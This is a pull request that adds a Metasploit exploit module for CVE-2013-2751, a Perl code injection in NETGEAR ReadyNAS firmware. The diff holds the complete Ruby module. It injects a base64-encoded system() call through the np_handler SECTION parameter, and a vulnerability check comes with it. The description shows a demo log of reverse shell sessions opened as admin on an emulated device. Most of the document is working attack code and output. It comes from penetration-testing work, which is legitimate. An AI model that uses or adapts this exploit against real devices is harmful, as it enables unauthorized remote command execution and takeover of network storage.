### PR TITLE
Add module for CVE-2013-2751

### DIFF
--- a/modules/exploits/linux/http/netgear_readynas_exec.rb
+++ b/modules/exploits/linux/http/netgear_readynas_exec.rb
@@ -59,6 +59,11 @@ class Metasploit3 < Msf::Exploit::Remote
       'DisclosureDate' => 'Jul 12 2013'
       ))
 
+    register_options(
+      [
+        Opt::RPORT(443)
+      ], self.class)
+
   end
 
   def send_request_payload(payload)

--- a/modules/exploits/linux/http/netgear_readynas_exec.rb
+++ b/modules/exploits/linux/http/netgear_readynas_exec.rb
@@ -1,0 +1,90 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'NETGEAR ReadyNAS Perl Code Evaluation',
+      'Description'    => %q{
+        This module exploits a Perl code injection on NETGEAR ReadyNAS 4.2.23 and 4.1.11. The
+        vulnerability exists on the web fronted, specifically on the np_handler.pl component,
+        due to the insecure usage of the eval() perl function. This module has been tested
+        successfully on a NETGEAR ReadyNAS 4.2.23 Firmware emulated environment, not on real
+        hardware.
+      },
+      'Author'         =>
+        [
+          'Craig Young ', # Vulnerability discovery
+          'hdm',          # diff the patch
+          'juan vazquez'  # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2013-2751' ],
+          [ 'OSVDB', '98826' ],
+          [ 'URL', 'http://www.tripwire.com/state-of-security/vulnerability-management/readynas-flaw-allows-root-access-unauthenticated-http-request/' ],
+          [ 'URL', 'http://www.tripwire.com/register/security-advisory-netgear-readynas/' ]
+        ],
+      'Platform'       => ['unix'],
+      'Arch'           => ARCH_CMD,
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'Space'       => 4096, # Has into account Apache request length and base64 ratio
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'generic perl telnet'
+            }
+        },
+      'Targets'        =>
+        [
+          [ 'NETGEAR ReadyNAS 4.2.23', { }]
+        ],
+      'DefaultOptions' =>
+        {
+          'SSL' => true
+        },
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jul 12 2013'
+      ))
+
+  end
+
+  def send_request_payload(payload)
+    res = send_request_cgi({
+      'uri' => normalize_uri("/np_handler", ""),
+      'vars_get' => {
+         'PAGE' =>'Nasstate',
+         'OPERATION' => 'get',
+         'SECTION' => payload
+      }
+    })
+    return res
+  end
+
+  def check
+    res = send_request_payload(")")
+    if res and res.code == 200 and res.body =~ /syntax error at \(eval/
+      return Exploit::CheckCode::Vulnerable
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    my_payload = "#{rand_text_numeric(1)});use MIME::Base64;system(decode_base64(\"#{Rex::Text.encode_base64(payload.encoded)}\")"
+    print_status("#{peer} - Executing payload...")
+    send_request_payload(my_payload)
+  end
+
+end

--- a/modules/exploits/linux/http/netgear_readynas_exec.rb
+++ b/modules/exploits/linux/http/netgear_readynas_exec.rb
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'         =>
         [
-          'Craig Young ', # Vulnerability discovery
+          'Craig Young', # Vulnerability discovery
           'hdm',          # diff the patch
           'juan vazquez'  # Metasploit module
         ],


### PR DESCRIPTION
Tested with NETGEAR ReadyNAS 4.2.23 Firmware. I have used a emulated environment by decompressing the firmware and chrooting. Unfortunately I haven't access to a real device for testing purposes. Because of that I've used ManualRanking.

If someone with access to a real device could verify would be neat :)

Demo:

```
msf exploit(netgear_readynas_exec) > check
[+] The target is vulnerable.
msf exploit(netgear_readynas_exec) > rexploit
[*] Reloading module...

[*] Started reverse double handler
[*] 192.168.172.136:80 - Executing payload...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo UzWixSZGjbi3Vt7P;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "UzWixSZGjbi3Vt7P\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.172.1:4444 -> 192.168.172.136:40710) at 2013-10-24 16:07:48 -0500

id
uid=1001(admin) gid=119(admin) groups=119(admin)
^C
Abort session 1? [y/N]  y

[*] 192.168.172.136 - Command shell session 1 closed.  Reason: User exit
msf exploit(netgear_readynas_exec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf exploit(netgear_readynas_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444
[*] 192.168.172.136:80 - Executing payload...
[*] Command shell session 2 opened (192.168.172.1:4444 -> 192.168.172.136:40712) at 2013-10-24 16:08:04 -0500

id
uid=1001(admin) gid=119(admin) groups=119(admin)
^C
Abort session 2? [y/N]  y

[*] 192.168.172.136 - Command shell session 2 closed.  Reason: User exit
```
